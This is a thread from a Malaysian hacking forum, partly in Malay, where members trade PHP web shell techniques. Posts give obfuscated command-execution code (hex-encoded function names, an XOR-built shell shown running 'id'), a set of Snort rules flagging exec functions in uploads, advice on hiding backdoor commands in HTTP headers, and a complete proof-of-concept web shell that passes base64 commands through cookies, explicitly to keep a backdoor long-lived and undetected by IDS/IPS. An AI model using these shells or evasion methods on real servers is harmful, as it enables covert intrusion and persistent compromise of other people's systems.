Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
TBDSecurity Shell 0.9.1
27-10-2013, 02:02 AM, (This post was last modified: 27-10-2013, 02:18 AM by jalil.)
Post: #91
RE: TBDSecurity Shell 0.9.1
(27-10-2013, 01:44 AM)d3ck4 Wrote: 3. Elakkan pakai php function utk cmd execution dlm shell macam system(), passthru(), exec(), etc.. aku lagi suka pakai <?php echo `[command]`; ?> simple as that and yet IDS evasion.

wsalam d3ck4,

how about using this method ?

PHP Code:
<?php

$jalil 
"\x73\171\x73\164\x65\155";
$jalil("\x6c\163\x20\055\x61\150");

?>

by the way, the most impressive method to obfuscate source code is by using jjencode

http://utf-8.jp/public/jjencode.html

but only available to javascript though
Reply
29-10-2013, 11:08 AM,
Post: #92
RE: TBDSecurity Shell 0.9.1
(27-10-2013, 02:02 AM)jalil Wrote: by the way, the most impressive method to obfuscate source code is by using jjencode

http://utf-8.jp/public/jjencode.html

but only available to javascript though
It's still possible in PHP.
PHP Code:
<?
$_="{";
$_=($_^"<").($_^">").($_^"/");
?>
<?=${'_'.$_}["_"](${'_'.$_}["__"]);?>
Code:
GET /test.php?_=system&__=id
uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)
[̲̅ə̲̅٨̲̅٥̲̅٦̲̅]
i ℓ٥ﻻ ﻉ√٥υ F٥rﻉ√ﻉr ღ
|_|0|_|
|_|_|0|
|0|0|0|
http://jonhburn2.freehostia.com/lol.txt
Reply
29-10-2013, 07:43 PM, (This post was last modified: 29-10-2013, 07:44 PM by mika_yazid.)
Post: #93
RE: TBDSecurity Shell 0.9.1
(27-10-2013, 01:44 AM)d3ck4 Wrote: salam..

this simple snort rules will easily catch php shell above..

# catch malicious file upload passthru() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP passthru()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"passthru("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337011; rev:9;)

# catch malicious file upload shell_exec() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP shell_exec()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"shell_exec("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337012; rev:9;)

# catch malicious file upload system() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP system()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"system("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337013; rev:9;)

# catch malicious file upload phpinfo() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP phpinfo()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"phpinfo("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337014; rev:9;)

# catch malicious file upload base64_decode() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP base64_decode()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"base64_decode("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337015; rev:9;)

# catch malicious file upload popen() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP popen()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"popen("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337016; rev:9;)

# catch malicious file upload exec() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP exec()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"exec("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337017; rev:9;)

# catch malicious file upload proc_open() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP proc_open()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"proc_open("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337018; rev:9;)

# catch malicious file upload pcntl_exec() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP pcntl_exec()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"pcntl_exec("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337019; rev:9;)

# catch malicious file upload python_eval() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP python_eval()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"python_eval("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337020; rev:9;)

# catch malicious file upload fopen() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP fopen()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"fopen("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337021; rev:9;)

# catch malicious file upload fclose() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP fclose()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"fclose("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337022; rev:9;)

# catch malicious file upload readfile() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP readfile()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"readfile("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337023; rev:9;)

# catch malicious file upload gzinflate() by Rahezar 26/10/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP gzinflate()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"gzinflate("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337031; rev:9;)

# catch malicious file upload str_rot13() by Rahezar 26/10/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP str_rot13()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"str_rot13("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337032; rev:9;)

IDS Evasion 101

ni cadangan aku:

1. Elakkan upload backdoor directly guna HTTP cleartext channel.. melainkan kalo HTTPS/SSL enable. tp kalo dah ada ssh, scp, sftp xs watpe nk letak web shell ye tak..
2. Elakkan guna HTTP POST/GET parameter utk supply remote command.. try guna parameter input dlm HTTP header instead.. Sebenarnya tak perlu nak encrypt shell script dengan eval(), gzinflate(), base64_decode(), str_rot13(), semua tu.. apa yg perlu di encrypt ialah traffic antara attacker's browser dengan victim's webserver; supplied remote command dan return result.

Contoh:

GET /shell.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Code: id; uname -a; cat /etc/issue;
Connection: keep-alive

so kat backend, shell.php akan render input dari HTTP header dgn parameter Code tu tadi.

3. Elakkan pakai php function utk cmd execution dlm shell macam system(), passthru(), exec(), etc.. aku lagi suka pakai <?php echo `[command]`; ?> simple as that and yet IDS evasion.

kesimpulannya, biar leceh sikit kerja asal backdoor boleh tahan lama n undetected.. POC simple php shell (yet 100% proven IDS/IPS evasion) akan menyusul dari aku. sekian

letak kat wiki.tbd.my please GayFace

(29-10-2013, 11:08 AM)johnburn Wrote:
(27-10-2013, 02:02 AM)jalil Wrote: by the way, the most impressive method to obfuscate source code is by using jjencode

http://utf-8.jp/public/jjencode.html

but only available to javascript though
It's still possible in PHP.
PHP Code:
<?
$_="{";
$_=($_^"<").($_^">").($_^"/");
?>
<?=${'_'.$_}["_"](${'_'.$_}["__"]);?>
Code:
GET /test.php?_=system&__=id
uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)

wiki.tbd.my please GayFace
Reply
30-10-2013, 03:37 PM,
Post: #94
RE: TBDSecurity Shell 0.9.1
(29-10-2013, 07:43 PM)mika_yazid Wrote:
(27-10-2013, 01:44 AM)d3ck4 Wrote: salam..

this simple snort rules will easily catch php shell above..

# catch malicious file upload passthru() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP passthru()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"passthru("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337011; rev:9;)

# catch malicious file upload shell_exec() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP shell_exec()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"shell_exec("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337012; rev:9;)

# catch malicious file upload system() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP system()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"system("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337013; rev:9;)

# catch malicious file upload phpinfo() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP phpinfo()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"phpinfo("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337014; rev:9;)

# catch malicious file upload base64_decode() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP base64_decode()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"base64_decode("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337015; rev:9;)

# catch malicious file upload popen() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP popen()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"popen("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337016; rev:9;)

# catch malicious file upload exec() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP exec()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"exec("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337017; rev:9;)

# catch malicious file upload proc_open() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP proc_open()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"proc_open("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337018; rev:9;)

# catch malicious file upload pcntl_exec() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP pcntl_exec()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"pcntl_exec("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337019; rev:9;)

# catch malicious file upload python_eval() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP python_eval()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"python_eval("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337020; rev:9;)

# catch malicious file upload fopen() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP fopen()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"fopen("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337021; rev:9;)

# catch malicious file upload fclose() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP fclose()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"fclose("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337022; rev:9;)

# catch malicious file upload readfile() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP readfile()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"readfile("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337023; rev:9;)

# catch malicious file upload gzinflate() by Rahezar 26/10/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP gzinflate()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"gzinflate("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337031; rev:9;)

# catch malicious file upload str_rot13() by Rahezar 26/10/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP str_rot13()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"str_rot13("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337032; rev:9;)

IDS Evasion 101

ni cadangan aku:

1. Elakkan upload backdoor directly guna HTTP cleartext channel.. melainkan kalo HTTPS/SSL enable. tp kalo dah ada ssh, scp, sftp xs watpe nk letak web shell ye tak..
2. Elakkan guna HTTP POST/GET parameter utk supply remote command.. try guna parameter input dlm HTTP header instead.. Sebenarnya tak perlu nak encrypt shell script dengan eval(), gzinflate(), base64_decode(), str_rot13(), semua tu.. apa yg perlu di encrypt ialah traffic antara attacker's browser dengan victim's webserver; supplied remote command dan return result.

Contoh:

GET /shell.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Code: id; uname -a; cat /etc/issue;
Connection: keep-alive

so kat backend, shell.php akan render input dari HTTP header dgn parameter Code tu tadi.

3. Elakkan pakai php function utk cmd execution dlm shell macam system(), passthru(), exec(), etc.. aku lagi suka pakai <?php echo `[command]`; ?> simple as that and yet IDS evasion.

kesimpulannya, biar leceh sikit kerja asal backdoor boleh tahan lama n undetected.. POC simple php shell (yet 100% proven IDS/IPS evasion) akan menyusul dari aku. sekian

letak kat wiki.tbd.my please GayFace

(29-10-2013, 11:08 AM)johnburn Wrote:
(27-10-2013, 02:02 AM)jalil Wrote: by the way, the most impressive method to obfuscate source code is by using jjencode

http://utf-8.jp/public/jjencode.html

but only available to javascript though
It's still possible in PHP.
PHP Code:
<?
$_="{";
$_=($_^"<").($_^">").($_^"/");
?>
<?=${'_'.$_}["_"](${'_'.$_}["__"]);?>
Code:
GET /test.php?_=system&__=id
uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)

wiki.tbd.my please GayFace

an advance IDS/IPS would easily catch the return result as a successful remote command execution.. as promise ealier, below is my simple POC shell regarding my whole idea of IDS/IPS evasion php shell..

Code:
<?php

        function encookie($sessid) {
                return base64_encode($sessid);
        }

        function decookie($sessid) {
                return base64_decode($sessid);
        }

        function chips($more) {
                return `$more`;
        }

        $param = decookie($_COOKIE['param']);
        $baked = chips($param);
        $ovenbaked = encookie($baked);

?>
<html>
<body>
<script language='javascript'>

        function decookie(sessid) {
                return atob(sessid);
        }

        function encookie() {
                var x = document.forms["cookiejar"]["sessid"].value;
                var y = "param=" + btoa(x);
                document.forms["cookiejar"]["sessid"].value = "1";
                document.cookie = y;
        }

        var chipsmore=decookie('<?php echo $ovenbaked; ?>');

        document.write("<pre>" + chipsmore + "</pre>");

</script>
<br /><br />

<form name="cookiejar" method="post" action="#" onsubmit="return encookie()" />
    <input type="Submit" value="#" />
    <tr><td><input type="text" name="sessid" id="sessid" /></td></tr>
</form>
</body>
</html>

wonder if we can use obfuscation (jjencode, etc..) on the code + combine together with our own encoding/decoding algorithm instead of using simple base64 as POC code above..
Reply


Possibly Related Threads...
Thread Author Replies Views Last Post
Information Pelbagai Jenis Shell hexrut 3 1,300 18-06-2012, 04:22 PM
Last Post: Godai
  TBDSecurity PHP Shell[Beta] XShimeX 19 4,717 03-09-2011, 09:48 AM
Last Post: FieryCold
  [SHELL] devilzShell [php/cgi/asp/aspx/jsp] chaernewbie 2 1,298 23-07-2011, 07:28 PM
Last Post: Tron
  TBDSecurity Website vulnerable scanner Tools XShimeX 29 5,909 21-07-2010, 03:47 AM
Last Post: aa
  XSS Shell wanbotak 5 2,399 18-04-2010, 12:43 PM
Last Post: Ahlspiess
  1 Set Hacker Shell Yang Seorang Hacker Mesti Mahu Ada KelvinLoh 15 2,595 22-10-2009, 10:56 AM
Last Post: StuckS
  Private Shell - ABC crew suhz 2 1,178 26-06-2009, 02:26 PM
Last Post: suhz
  [ASP] ASP Shell XShimeX 0 643 12-04-2009, 11:07 PM
Last Post: XShimeX
  [PHP] C100 Shell XShimeX 0 441 12-04-2009, 11:06 PM
Last Post: XShimeX
  [PHP] Ajax PHP Command Shell XShimeX 0 894 12-04-2009, 11:04 PM
Last Post: XShimeX

Forum Jump: